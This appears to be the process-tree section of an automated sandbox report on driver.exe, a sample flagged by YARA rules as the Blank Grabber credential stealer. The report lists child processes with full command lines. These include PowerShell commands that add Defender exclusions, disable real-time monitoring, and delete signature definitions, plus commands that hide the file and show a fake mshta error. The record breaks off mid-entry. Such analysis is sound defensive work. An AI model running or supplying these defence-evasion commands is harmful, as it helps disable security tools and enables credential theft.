                                                                                                                                                                                                                                              Click to jump to process

                                                                                                                                                                                                                                              Click to jump to process

                                                                                                                                                                                                                                              Click to dive into process behavior distribution

                                                                                                                                                                                                                                              Click to jump to process

                                                                                                                                                                                                                                              Target ID:0
                                                                                                                                                                                                                                              Start time:05:00:02
                                                                                                                                                                                                                                              Start date:10/01/2025
                                                                                                                                                                                                                                              Path:C:\Users\user\Desktop\driver.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:"C:\Users\user\Desktop\driver.exe"
                                                                                                                                                                                                                                              Imagebase:0x7ff6a29b0000
                                                                                                                                                                                                                                              File size:8'761'213 bytes
                                                                                                                                                                                                                                              MD5 hash:D368F3959B9A9FF30D34004D99676729
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                                                                              • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000000.00000003.2060159493.000001C6D7275000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                              • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000000.00000003.2060159493.000001C6D7273000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:2
                                                                                                                                                                                                                                              Start time:05:00:04
                                                                                                                                                                                                                                              Start date:10/01/2025
                                                                                                                                                                                                                                              Path:C:\Users\user\Desktop\driver.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:"C:\Users\user\Desktop\driver.exe"
                                                                                                                                                                                                                                              Imagebase:0x7ff6a29b0000
                                                                                                                                                                                                                                              File size:8'761'213 bytes
                                                                                                                                                                                                                                              MD5 hash:D368F3959B9A9FF30D34004D99676729
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                                                                              • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000002.00000003.2435665528.000001C0EE2E0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                              • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000002.00000002.2439477041.000001C0EDE90000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.2439477041.000001C0EDE90000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                              • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000002.00000003.2434059105.000001C0EEF45000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                              • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000002.00000003.2076357362.000001C0EE03E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                              • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000002.00000002.2440748716.000001C0EE2E1000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:3
                                                                                                                                                                                                                                              Start time:05:00:06
                                                                                                                                                                                                                                              Start date:10/01/2025
                                                                                                                                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\driver.exe'"
                                                                                                                                                                                                                                              Imagebase:0x7ff7546d0000
                                                                                                                                                                                                                                              File size:289'792 bytes
                                                                                                                                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:4
                                                                                                                                                                                                                                              Start time:05:00:06
                                                                                                                                                                                                                                              Start date:10/01/2025
                                                                                                                                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
                                                                                                                                                                                                                                              Imagebase:0x7ff7546d0000
                                                                                                                                                                                                                                              File size:289'792 bytes
                                                                                                                                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:5
                                                                                                                                                                                                                                              Start time:05:00:06
                                                                                                                                                                                                                                              Start date:10/01/2025
                                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                              Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:6
                                                                                                                                                                                                                                              Start time:05:00:06
                                                                                                                                                                                                                                              Start date:10/01/2025
                                                                                                                                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('error 0x1233112x', 0, 'invalid key', 32+16);close()""
                                                                                                                                                                                                                                              Imagebase:0x7ff7546d0000
                                                                                                                                                                                                                                              File size:289'792 bytes
                                                                                                                                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:7
                                                                                                                                                                                                                                              Start time:05:00:06
                                                                                                                                                                                                                                              Start date:10/01/2025
                                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                              Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:8
                                                                                                                                                                                                                                              Start time:05:00:06
                                                                                                                                                                                                                                              Start date:10/01/2025
                                                                                                                                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\user\Desktop\driver.exe""
                                                                                                                                                                                                                                              Imagebase:0x7ff7546d0000
                                                                                                                                                                                                                                              File size:289'792 bytes
                                                                                                                                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:9
                                                                                                                                                                                                                                              Start time:05:00:06
                                                                                                                                                                                                                                              Start date:10/01/2025
                                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                              Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:10
                                                                                                                                                                                                                                              Start time:05:00:06
                                                                                                                                                                                                                                              Start date:10/01/2025
                                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                              Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:11
                                                                                                                                                                                                                                              Start time:05:00:06
                                                                                                                                                                                                                                              Start date:10/01/2025
                                                                                                                                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ?? .scr'"
                                                                                                                                                                                                                                              Imagebase:0x7ff7546d0000
                                                                                                                                                                                                                                              File size:289'792 bytes
                                                                                                                                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:12
                                                                                                                                                                                                                                              Start time:05:00:06
                                                                                                                                                                                                                                              Start date:10/01/2025
                                                                                                                                                                                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\driver.exe'
                                                                                                                                                                                                                                              Imagebase:0x7ff7be880000
                                                                                                                                                                                                                                              File size:452'608 bytes
                                                                                                                                                                                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:13
                                                                                                                                                                                                                                              Start time:05:00:06
                                                                                                                                                                                                                                              Start date:10/01/2025
                                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                              Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:14
                                                                                                                                                                                                                                              Start time:05:00:06
                                                                                                                                                                                                                                              Start date:10/01/2025
                                                                                                                                                                                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                                                                                                                                                                                                                                              Imagebase:0x7ff7be880000
                                                                                                                                                                                                                                              File size:452'608 bytes
                                                                                                                                                                                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:15
                                                                                                                                                                                                                                              Start time:05:00:06
                                                                                                                                                                                                                                              Start date:10/01/2025
                                                                                                                                                                                                                                              Path:C:\Windows\System32\mshta.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('error 0x1233112x', 0, 'invalid key', 32+16);close()"
                                                                                                                                                                                                                                              Imagebase:0x7ff7b9f60000
                                                                                                                                                                                                                                              File size:14'848 bytes
                                                                                                                                                                                                                                              MD5 hash:0B4340ED812DC82CE636C00FA5C9BEF2
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:16
                                                                                                                                                                                                                                              Start time:05:00:06
                                                                                                                                                                                                                                              Start date:10/01/2025
                                                                                                                                                                                                                                              Path:C:\Windows\System32\attrib.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:attrib +h +s "C:\Users\user\Desktop\driver.exe"
                                                                                                                                                                                                                                              Imagebase:0x7ff64e8e0000
                                                                                                                                                                                                                                              File size:23'040 bytes
                                                                                                                                                                                                                                              MD5 hash:5037D8E6670EF1D89FB6AD435F12A9FD
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:17
                                                                                                                                                                                                                                              Start time:05:00:06
                                                                                                                                                                                                                                              Start date:10/01/2025
                                                                                                                                                                                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ?? .scr'
                                                                                                                                                                                                                                              Imagebase:0x7ff7be880000
                                                                                                                                                                                                                                              File size:452'608 bytes
                                                                                                                                                                                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:18
                                                                                                                                                                                                                                              Start time:05:00:07
                                                                                                                                                                                                                                              Start date:10/01/2025
                                                                                                                                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                                                                                                                                                                                                              Imagebase:0x7ff7546d0000
                                                                                                                                                                                                                                              File size:289'792 bytes
                                                                                                                                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:19
                                                                                                                                                                                                                                              Start time:05:00:07
                                                                                                                                                                                                                                              Start date:10/01/2025
                                                                                                                                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                                                                                                                                                                                                              Imagebase:0x7ff7546d0000
                                                                                                                                                                                                                                              File size:289'792 bytes
                                                                                                                                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:20
                                                                                                                                                                                                                                              Start time:05:00:07
                                                                                                                                                                                                                                              Start date:10/01/2025
                                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                              Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:21
                                                                                                                                                                                                                                              Start time:05:00:07
                                                                                                                                                                                                                                              Start date:10/01/2025
                                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                              Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:22
                                                                                                                                                                                                                                              Start time:05:00:08
                                                                                                                                                                                                                                              Start date:10/01/2025
                                                                                                                                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
                                                                                                                                                                                                                                              Imagebase:0x7ff7546d0000
                                                                                                                                                                                                                                              File size:289'792 bytes
                                                                                                                                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:23
                                                                                                                                                                                                                                              Start time:05:00:08
                                                                                                                                                                                                                                              Start date:10/01/2025
                                                                                                                                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
                                                                                                                                                                                                                                              Imagebase:0x7ff7546d0000
                                                                                                                                                                                                                                              File size:289'792 bytes
                                                                                                                                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:24
                                                                                                                                                                                                                                              Start time:05:00:08
                                                                                                                                                                                                                                              Start date:10/01/2025
                                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                              Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:25
                                                                                                                                                                                                                                              Start time:05:00:08
                                                                                                                                                                                                                                              Start date:10/01/2025
                                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                              Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:26
                                                                                                                                                                                                                                              Start time:05:00:08
                                                                                                                                                                                                                                              Start date:10/01/2025
                                                                                                                                                                                                                                              Path:C:\Windows\System32\tasklist.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:tasklist /FO LIST
                                                                                                                                                                                                                                              Imagebase:0x7ff6d1120000
                                                                                                                                                                                                                                              File size:106'496 bytes
                                                                                                                                                                                                                                              MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:27
                                                                                                                                                                                                                                              Start time:05:00:08
                                                                                                                                                                                                                                              Start date:10/01/2025
                                                                                                                                                                                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:powershell Get-Clipboard
                                                                                                                                                                                                                                              Imagebase:0x7ff7be880000
                                                                                                                                                                                                                                              File size:452'608 bytes
                                                                                                                                                                                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:28
                                                                                                                                                                                                                                              Start time:05:00:08
                                                                                                                                                                                                                                              Start date:10/01/2025
                                                                                                                                                                                                                                              Path:C:\Windows\System32\tasklist.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:tasklist /FO LIST
                                                                                                                                                                                                                                              Imagebase:0x7ff6d1120000
                                                                                                                                                                                                                                              File size:106'496 bytes
                                                                                                                                                                                                                                              MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:29
                                                                                                                                                                                                                                              Start time:05:00:08
                                                                                                                                                                                                                                              Start date:10/01/2025
                                                                                                                                                                                                                                              Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
                                                                                                                                                                                                                                              Imagebase:0x7ff698260000
                                                                                                                                                                                                                                              File size:576'000 bytes
                                                                                                                                                                                                                                              MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:30
                                                                                                                                                                                                                                              Start time:05:00:08
                                                                                                                                                                                                                                              Start date:10/01/2025
                                                                                                                                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                                                                                                                                                                                                              Imagebase:0x7ff7546d0000
                                                                                                                                                                                                                                              File size:289'792 bytes
                                                                                                                                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:31
                                                                                                                                                                                                                                              Start time:05:00:08
                                                                                                                                                                                                                                              Start date:10/01/2025
                                                                                                                                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                                                                                                                                                              Imagebase:0x7ff7546d0000
                                                                                                                                                                                                                                              File size:289'792 bytes
                                                                                                                                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:32
                                                                                                                                                                                                                                              Start time:05:00:08
                                                                                                                                                                                                                                              Start date:10/01/2025
                                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                              Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:33
                                                                                                                                                                                                                                              Start time:05:00:08
                                                                                                                                                                                                                                              Start date:10/01/2025
                                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                              Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:34
                                                                                                                                                                                                                                              Start time:05:00:09
                                                                                                                                                                                                                                              Start date:10/01/2025
                                                                                                                                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
